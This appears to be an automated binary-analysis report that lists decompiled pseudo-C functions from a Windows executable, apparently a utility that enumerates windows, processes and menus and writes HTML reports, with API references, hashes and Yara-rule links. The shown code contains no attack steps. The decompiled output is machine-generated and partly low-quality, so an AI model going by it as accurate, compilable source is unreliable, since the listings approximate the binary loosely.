				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                      0x00406157
                                                                                      0x0040616d
                                                                                      0x00406174
                                                                                      0x0040617f
                                                                                      0x00406185
                                                                                      0x00406196
                                                                                      0x0040619e
                                                                                      0x004061b6
                                                                                      0x004061bd
                                                                                      0x004061d4
                                                                                      0x004061da
                                                                                      0x004061e0
                                                                                      0x004061e5
                                                                                      0x004061e6
                                                                                      0x004061ef
                                                                                      0x004061f9
                                                                                      0x004061ff
                                                                                      0x004061ef
                                                                                      0x00406206

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                      • String ID: sysdatetimepick32
                                                                                      • API String ID: 1028950076-4169760276
                                                                                      • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                      • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                      • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                      • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 68%
                                                                                      			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                      0x00404706
                                                                                      0x00404714
                                                                                      0x0040471c
                                                                                      0x00404721
                                                                                      0x0040472b
                                                                                      0x00404733
                                                                                      0x00404735
                                                                                      0x00404735
                                                                                      0x00404733
                                                                                      0x00404751
                                                                                      0x00404780
                                                                                      0x00404753
                                                                                      0x0040475e
                                                                                      0x00404766
                                                                                      0x0040476c
                                                                                      0x00404770
                                                                                      0x00404770
                                                                                      0x0040478a

                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                      • wcslen.MSVCRT ref: 00404756
                                                                                      • wcscpy.MSVCRT ref: 00404766
                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                      • wcscpy.MSVCRT ref: 00404780
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                      • String ID: netmsg.dll
                                                                                      • API String ID: 2767993716-3706735626
                                                                                      • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                      • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                      • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                      • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                      0x0040598b
                                                                                      0x0040598b
                                                                                      0x0040599a
                                                                                      0x004059ae
                                                                                      0x004059b5
                                                                                      0x004059c1
                                                                                      0x004059c6
                                                                                      0x004059cb
                                                                                      0x004059ce
                                                                                      0x00405a7b
                                                                                      0x00405a7b
                                                                                      0x004059d4
                                                                                      0x004059d4
                                                                                      0x004059dc
                                                                                      0x004059ee
                                                                                      0x00000000
                                                                                      0x004059f0
                                                                                      0x004059f0
                                                                                      0x004059f6
                                                                                      0x004059f7
                                                                                      0x004059fa
                                                                                      0x00405a03
                                                                                      0x00405a2b
                                                                                      0x00405a2e
                                                                                      0x00405a3c
                                                                                      0x00405a40
                                                                                      0x00000000
                                                                                      0x00405a42
                                                                                      0x00405a42
                                                                                      0x00405a54
                                                                                      0x00405a59
                                                                                      0x00405a5a
                                                                                      0x00405a5a
                                                                                      0x00405a61
                                                                                      0x00405a69
                                                                                      0x00405a7f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405a69
                                                                                      0x00405a05
                                                                                      0x00405a0e
                                                                                      0x00405a17
                                                                                      0x00000000
                                                                                      0x00405a19
                                                                                      0x00405a19
                                                                                      0x00405a1c
                                                                                      0x00405a1d
                                                                                      0x00405a20
                                                                                      0x00405a29
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405a29
                                                                                      0x00405a17
                                                                                      0x00405a03
                                                                                      0x00000000
                                                                                      0x00405a6b
                                                                                      0x00405a6e
                                                                                      0x00405a72
                                                                                      0x00405a72
                                                                                      0x00000000
                                                                                      0x004059d4
                                                                                      0x00405a81
                                                                                      0x00405a84
                                                                                      0x00405a8f

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004059B5
                                                                                        • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                        • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                        • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                        • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                        • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                        • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                        • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                        • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                        • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                        • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                        • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                        • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                      • _wcsicmp.MSVCRT ref: 004059FA
                                                                                      • wcschr.MSVCRT ref: 00405A0E
                                                                                      • _wcsicmp.MSVCRT ref: 00405A20
                                                                                      • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 768606695-0
                                                                                      • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                      • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                      • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                      • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 64%
                                                                                      			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                      0x00407639
                                                                                      0x00407646
                                                                                      0x00407647
                                                                                      0x00407654
                                                                                      0x0040765f
                                                                                      0x0040765f
                                                                                      0x0040766b
                                                                                      0x0040766d
                                                                                      0x00407672
                                                                                      0x00407677
                                                                                      0x0040767d
                                                                                      0x00407680
                                                                                      0x00407686
                                                                                      0x00407691
                                                                                      0x00407697
                                                                                      0x00407699
                                                                                      0x00407699
                                                                                      0x0040769c
                                                                                      0x0040769f
                                                                                      0x004076a3
                                                                                      0x004076a7
                                                                                      0x004076ab
                                                                                      0x004076b5
                                                                                      0x004076be
                                                                                      0x004076c8
                                                                                      0x004076de
                                                                                      0x004076ee
                                                                                      0x004076f1
                                                                                      0x004076f4
                                                                                      0x004076fa
                                                                                      0x00407708
                                                                                      0x0040770e
                                                                                      0x00407718
                                                                                      0x0040771d
                                                                                      0x00407723
                                                                                      0x00407724
                                                                                      0x00407727
                                                                                      0x0040772c
                                                                                      0x0040772f
                                                                                      0x00407734
                                                                                      0x0040773f
                                                                                      0x00407744
                                                                                      0x00407745
                                                                                      0x0040767d
                                                                                      0x00407760

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintfwcscat
                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                      • API String ID: 384018552-4153097237
                                                                                      • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                      • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                      • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                      • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 42%
                                                                                      			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                      0x0040605e
                                                                                      0x00406061
                                                                                      0x00406069
                                                                                      0x00406074
                                                                                      0x0040607a
                                                                                      0x0040607e
                                                                                      0x00406082
                                                                                      0x00406148
                                                                                      0x0040614e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406088
                                                                                      0x00406088
                                                                                      0x00406093
                                                                                      0x00406098
                                                                                      0x0040609f
                                                                                      0x004060ae
                                                                                      0x004060b6
                                                                                      0x004060be
                                                                                      0x004060c6
                                                                                      0x004060ca
                                                                                      0x004060cf
                                                                                      0x004060d7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004060de
                                                                                      0x00406129
                                                                                      0x00406129
                                                                                      0x0040612d
                                                                                      0x0040612f
                                                                                      0x00406130
                                                                                      0x00406134
                                                                                      0x00406137
                                                                                      0x0040613c
                                                                                      0x0040613c
                                                                                      0x00000000
                                                                                      0x0040612d
                                                                                      0x004060e7
                                                                                      0x004060f0
                                                                                      0x004060f2
                                                                                      0x004060f2
                                                                                      0x004060f9
                                                                                      0x004060fd
                                                                                      0x00406102
                                                                                      0x0040610c
                                                                                      0x00406112
                                                                                      0x00406117
                                                                                      0x00406117
                                                                                      0x00406104
                                                                                      0x00406104
                                                                                      0x00406104
                                                                                      0x00406104
                                                                                      0x00406102
                                                                                      0x00406122
                                                                                      0x00406128
                                                                                      0x00000000
                                                                                      0x0040613f
                                                                                      0x0040613f
                                                                                      0x00406140
                                                                                      0x00000000

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                      • String ID: 0$6
                                                                                      • API String ID: 2029023288-3849865405
                                                                                      • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                      • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                      • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                      • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 82%
                                                                                      			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                      0x00402bee
                                                                                      0x00402bf8
                                                                                      0x00402cae
                                                                                      0x00402c08
                                                                                      0x00402c10
                                                                                      0x00402c11
                                                                                      0x00402c12
                                                                                      0x00402c13
                                                                                      0x00402c20
                                                                                      0x00402c27
                                                                                      0x00402c2e
                                                                                      0x00402c30
                                                                                      0x00402c37
                                                                                      0x00402c4b
                                                                                      0x00402c50
                                                                                      0x00402c53
                                                                                      0x00402c55
                                                                                      0x00402c3e
                                                                                      0x00402c3e
                                                                                      0x00402c41
                                                                                      0x00402c41
                                                                                      0x00402c5a
                                                                                      0x00402c60
                                                                                      0x00402c65
                                                                                      0x00402c68
                                                                                      0x00402c6d
                                                                                      0x00402c77
                                                                                      0x00402c7c
                                                                                      0x00402c7e
                                                                                      0x00402c87
                                                                                      0x00402ca5
                                                                                      0x00402ca5
                                                                                      0x00402c87
                                                                                      0x00402c7c
                                                                                      0x00402c6d
                                                                                      0x00000000
                                                                                      0x00402cac

                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                      • GetSystemMetrics.USER32 ref: 00402C23
                                                                                      • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                      • GetSystemMetrics.USER32 ref: 00402C30
                                                                                      • GetSystemMetrics.USER32 ref: 00402C47
                                                                                      • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem$Window
                                                                                      • String ID:
                                                                                      • API String ID: 1155976603-0
                                                                                      • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                      • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                      • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                      • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                      0x004036ef
                                                                                      0x004036f6
                                                                                      0x0040370b
                                                                                      0x00403712
                                                                                      0x00403717
                                                                                      0x0040371c
                                                                                      0x0040371f
                                                                                      0x0040372c
                                                                                      0x00403735
                                                                                      0x00403738
                                                                                      0x00403744
                                                                                      0x00403751
                                                                                      0x00403758
                                                                                      0x00403760
                                                                                      0x00403769
                                                                                      0x0040376c
                                                                                      0x00403778
                                                                                      0x0040377b
                                                                                      0x0040378b
                                                                                      0x00403792
                                                                                      0x00403795
                                                                                      0x00403798
                                                                                      0x0040379b
                                                                                      0x004037a2
                                                                                      0x004037a5
                                                                                      0x004037a8
                                                                                      0x004037af
                                                                                      0x004037b7
                                                                                      0x004037c3
                                                                                      0x00000000
                                                                                      0x004037d4
                                                                                      0x004037dc

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004036F6
                                                                                      • memset.MSVCRT ref: 00403712
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                        • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                        • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                        • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                        • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
